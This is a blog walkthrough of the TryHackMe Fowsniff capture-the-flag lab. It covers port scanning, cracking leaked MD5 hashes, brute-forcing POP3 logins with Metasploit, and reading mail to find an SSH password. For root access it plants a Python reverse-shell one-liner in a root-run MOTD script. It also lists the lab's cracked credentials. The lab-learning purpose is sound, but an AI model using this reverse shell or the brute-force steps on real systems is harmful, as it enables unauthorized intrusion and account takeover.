Open in app

Sign in

Write

Sign in

Fowsniff CTF | TryHackMe

Nihir Zala
6 min readFeb 28, 2023

--

Enumeration

So let's try to find out what ports and services are openly using nmap . The command I use generally for Nmap is nmap -sV -vv <machine_ip> . This is not extensive, but this is the one I use for a quick starting scan. If I feel I haven’t found enough, or to get more information, I can return to do another scan with some additional flags, but this should be enough to get us started.

So let's run that scan here: nmap -sV -vv 10.10.157.167 and we see the following results:

Nmap scan results

As we can see, ports 80, 110, and 143 are the ports that seem to be open from the common ports. Port 80 is for HTTP, 110 is for POP3, and 143 is for IMAP.

Let's take a look at the website at http://10.10.157.167 .

Fowsniff Corp website

We see that on the page, it says the internal system of Fowsniff suffered a data breach and employee usernames and passwords might have been exposed. Attackers were also able to hijack the official @fowsniffcorp Twitter account, and sensitive information might be released by attackers via this account! Let's see if they already did :).

On checking the @fowsniffcorp Twitter account, we see the following:

Fowsniff Corp's Twitter account

It seems it has been pwned, as suspected. The attacker seems to have leaked the passwords as seen in the pinned tweet. Let's open the Pastebin link to see the dump.

Going to https://pastebin.com/NrAqVeeX we get the following password hashes dumped along with the email addresses:

mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!Here are their email passwords dumped from their databases.They left their pop3 server WIDE OPEN, too!MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P

So as all those are password hashes hashed with MD5, we can try to crack them. However, before doing that, just wanted to point out this last tweet by the hijacked account of FowSniffCorp:

This indicates that the sysadmin has the following credentials:

stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd

Hash Cracking

Let's crack that hash using an online tool, CrackStation, at crackstation.net .

Hmm, it seems CrackStation could not crack the hash. Let's see if we can upload the hash list and whether we can crack the hashes:

CrackStation hash cracker

As we can see, CrackStation was able to crack all hashes except one, the one for the sysadmin.

Now let's try to see if we can brute force the pop3 login using Metasploit, as asked in one of the questions in the room.
On opening msfconsole and doing search pop3 , we get the first option as auxiliary/scanner/pop3/pop3_login . Seems like we can brute-force email logins using this module.
Let's use this module to brute force the login. First, select that module to use using use auxiliary/scanner/pop3/pop3_login . (Tip: we can also use the module # in the search results, 0 here, like use 0 to directly select the corresponding module number).

Now once we selected to use the module, we can show the options we need to set using show options .

Metasploit POP3 shows options

As we can see, I have already set the options. It is required to set BRUTEFORCE_SPEED, RHOSTS(the machine we are attacking), RPORT(POP3 port), STOP_ON_SUCCESS, THREADS, and VERBOSE. I set the USERPASS_FILE which contains the usernames and passwords we cracked in pairs, with each pair on a line, separated by space. (Note: I had to remove the @fowsniff part from the usernames to get a SUCCESS). Also, you can point USER_FILE and PASS_FILE to any empty files you want, otherwise, it will use the default files which was taking longer in my case.
Once we have the options set, all we need to do is run the module usingrun .
It will brute force our username and password combinations.

POP3 Username and Password brute force results

As we can see, Metasploit ran our username and password combinations against the POP3 server. It came back with one success, it seems seina:scoobydoo2 worked.

Question: What was seina’s password to the email service?
Answer: scoobydoo2.

Let’s try to connect to the email service using Seina’s credentials.

To do this, I did a quick search on DuckDuckGo and found this site: https://electrictoolbox.com/pop3-commands/
So we can do a telnet 10.10.157.167 110 to connect to the email server using telnet.
After that, we can issue the USER seina followed by PASS scoobydoo2 commands and we can see we are logged in.
Now we can do LIST to see the email message list which shows us the summary of messages with the number of the message and the byte size of the message.

We can do a RETR 1 to retrieve the 1st message. On doing that, we see it is from stone@fowsniff and it seems it's sent to all other employees.

From the message we get the temporary SSH password:

S1ck3nBluff+secureshell

Question: Looking through her emails, what was a temporary password set for her?
Answer: S1ck3nBluff+secureshell

Similarly, we can retrieve the 2nd email message, but in that, we don't see anything much useful.

Now let's try to connect to the SSH login account using stone’s account with that password, as pointed out in the next question:

ssh stone@10.10.157.167

It seems that this password doesn't work for stone or seina . Let's see if it works for baksteen , as the 2nd email was sent by them.

And it worked! we are logged in to the system as baksteen .

Privilege Escalation

Let's see which groups the user is part of. We can do that using the groups command. We can see that baksteen is a part of the users and baksteen groups. Let's see if any interesting files can be executed by users of those groups.

We see an interesting file, /opt/cube/cube.sh . On checking the permissions, we see it is owned by users the group, and we can write to that file. We can see that this file is run by root whenever the Message of The Day file at /etc/update-motd.d/00-header is run(whenever we ssh to the machine), so let's include a reverse shell code inside the file. We can use the python reverse shell provided by TryHackMe:

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

We can replace <IP> with our attacking IP(in quotes), and 1234 with any port that we want to receive a reverse shell connection back on.

Now we can set up a netcat listener on our attacking machine where we will receive the reverse shell connection: nc -lvnp 4444

Once we have everything ready, we can connect to the device using SSH again as baksteen .

And right after we log in to the machine, we get a reverse shell connection back as root on the netcat listener!

Root access

And that completes

Tryhackme
Fowsniff Ctf Walkthrough
Cybersecurity
Reverse Engineering
Ctf

--

--

Nihir Zala

Written by Nihir Zala

36 Followers

Hi there, I'm Nihir Zala—a Laravel developer from Gujrat, India, with over 2.5 years of professional experience. I also learning Penetesting from THM and HTB.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams